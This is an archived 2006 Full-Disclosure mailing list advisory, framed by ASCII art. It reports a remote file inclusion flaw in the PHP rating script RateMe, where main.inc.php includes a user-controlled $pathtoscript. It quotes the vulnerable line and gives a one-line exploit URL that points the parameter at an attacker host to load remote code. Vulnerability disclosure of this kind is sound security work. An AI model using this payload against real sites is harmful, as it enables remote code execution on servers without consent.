[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] RateMe <= all versions => ( main.inc.php ) Remote File Include Vulnerability
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] RateMe <= all versions => ( main.inc.php ) Remote File Include Vulnerability
- From: "saudi arabia" <saudi@xxxxxxxxxx>
- Date: Mon, 18 Dec 2006 11:34:34 +0000
<html><div style='background-color:'><DIV>
<DIV>
<DIV>
<DIV>
<P>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++<BR>+ ;;ii,,::<BR>+
:::: :: ;;tt;;::<BR>+ ;;:: ..,,:: ;;ii,,::<BR>+ ,,,,
ii;;,, ii;;:: ;;ii,,::<BR>+ ii:: tt;;,, ..tt;;,,.. ;;ii;;:: <BR>+ ii,,:: ttii,, ..ff;;;;::
;;ii;;::<BR>+ tt;;::..,, tt;;,, ff;;;;ii ;;ii,,::<BR>+ tt;;::;;:: tt;;,,.. jj;;,,.. ;;tt,,::<BR>+
tt;;;;,, tt;;,,.. tt;;;; ;;ii;;::<BR>+ ..::,,;;,, tt;;,,.. tt;;,, ;;ii,,::<BR>+ ..::,,ii;;;;.. tt;;,,.. iiii,,::
;;ii,,::<BR>+ ::,,ttiijj;;,, tt;;;;.. ;;tt,,:: ;;ii,,::<BR>+ ,,;;ii tt;;,, ii;;,,.. ..jj;;:: ;;ii;;::<BR>+ ;;;;:: tt;;::
tt;;;;.. ff;;:: ;;tt,,..<BR>+ ii;;.. ,,ii;;:: ii;;,,.. jj;;,, ;;ii,,..<BR>+ ,,;;,, ::;;;;;;:: ii;;;;.. tt;;,, ;;ii;;..<BR>+ tt;;::::
::,,;;jj,,:: tt;;,,.. tt;;,, ;;ii,,..<BR>+ jj;;;;,,,,,,iiiiii;;:: ..tt;;,,:: iiii,, ;;ii,,..<BR>+ ;;ffjjttjjttii ii;;:: ii;;;;;;:: ..jj,, ;;ii;;..<BR>+
...;;.. ii;;,,:: ,,;;;;jj;;,, ..jj,, ;;ii,,..<BR>+ iiii;;,,::::....::,,,,;;,,jj;;;;,,:: ::,,;;,, ;;ii;;<BR>+ ..ff;;;;;;,,,,::,,;;;;;; ttii;;;;,,,,,,,,;;;;::
;;ii,,<BR>+ jjii;;;;;;;;;;;;;;ii.. ..ff;;;;;;;;;;;;;;;; ;;ii,,<BR>+ jjjj;;;;ii;;;;tt.. iijj;;;;;;;;;;ii:: ;;ii::<BR>+ iijjjjjjtt;;
;;ffffjjjjtt:: ;;ii<BR>+ ;;..
ii;;<BR>+ ..<BR>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++<BR>#########################################################################################################<BR># Affected Script: RateMe<BR># Exploit name : RateMe <= all versions => ( main.inc.php ) Remote File Include Vulnerability<BR># Author: Al7ejaz Hacker<BR># Website: <A
href="http://www.planetluc.com/en/";>http://www.planetluc.com/en/</A> not free version<BR># Discovered: 15/12/2006<BR># Conatact : saudi[at]hotmail.fr - & - al7ejaz.hackerz[at]gmail.com<BR>#########################################################################################################<BR>#########################################################################################################<BR>#<BR># Description :<BR># File infected : main.inc.php , line 17<BR>#<BR># echo "\n<!-- Start RateMe v$version output -->\n\n<link href='".$pathtoscript."style.css' rel='stylesheet' type='text/css'>\n<div class='votingtxt'>";<BR># include($pathtoscript.'db_connect.inc.php'); # <==<BR>#<BR># Exploit : <A
href="http://victime/path/main.inc.php?pathtoscript=http://Atacke";>http://victime/path/main.inc.php?pathtoscript=http://Atacke</A><BR>#<BR>########################################################################################################</P></DIV></DIV></DIV></DIV></div></html>
@
@
@W
,#WW
,@WW
, ,W WWW
W, ,:W WWW
,W* @W+ WWW
WWW WWWW WWW
WWW , WWWW WWW
,:W WWW WWWW WWW
,*WW WWW WWW, WWW
, .WWW WWW, WWW WWW
, WWW@ ,WW, , WW# WWW
, WW W ,WW* WWW WWW
,#WW W, WWW WWW, WWW
,WW,WW WWW WWW, WWW
, *WW WW WWW WWW, WWW
*, WW WW WWW WWW WWW
, , WW,,WW WWW WWW WWW
W ,WWW WW. WWW WWW, WWW
W WW WW, #WWW #WW WWW
W WW WW: @WWW WW. WWW
W W@ WWW ,W:WW. WW* WWW
WW *W , WWW, WW WWW, WW. WWW
:@ WW WWW WWW WWW@, WW WWW
, W* , ,WW WWW, WWW @WWW@ ,WWW WWW
,,WW,,, W# WWWWWW#WWWW. WWWWWWWWWW: ,WWW
*WW, WW, ,WWWWWWWWWW :WWWWWWWWW WWW
WWWWWW :WWWWWWWW ,@WWWWWWW WWW
,,WWWW WWWWW,, , WWWW# WW@
W@
@
#########################################################################################################
# Affected Script: RateMe
# Exploit name : RateMe <= all versions => ( main.inc.php ) Remote File
Include Vulnerability
# Author: Al7ejaz Hacker
# Website: http://www.planetluc.com/en/ not free version
# Discovered: 15/12/2006
# Conatact : saudi[at]hotmail.fr - & - al7ejaz.hackerz[at]gmail.com
#########################################################################################################
#########################################################################################################
#
# Description :
# File infected : main.inc.php , line 17
#
# echo "\n<!-- Start RateMe v$version output -->\n\n<link
href='".$pathtoscript."style.css' rel='stylesheet' type='text/css'>\n<div
class='votingtxt'>";
# include($pathtoscript.'db_connect.inc.php'); # <==
#
# Exploit : http://victime/path/main.inc.php?pathtoscript=http://Atacke
#
########################################################################################################
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/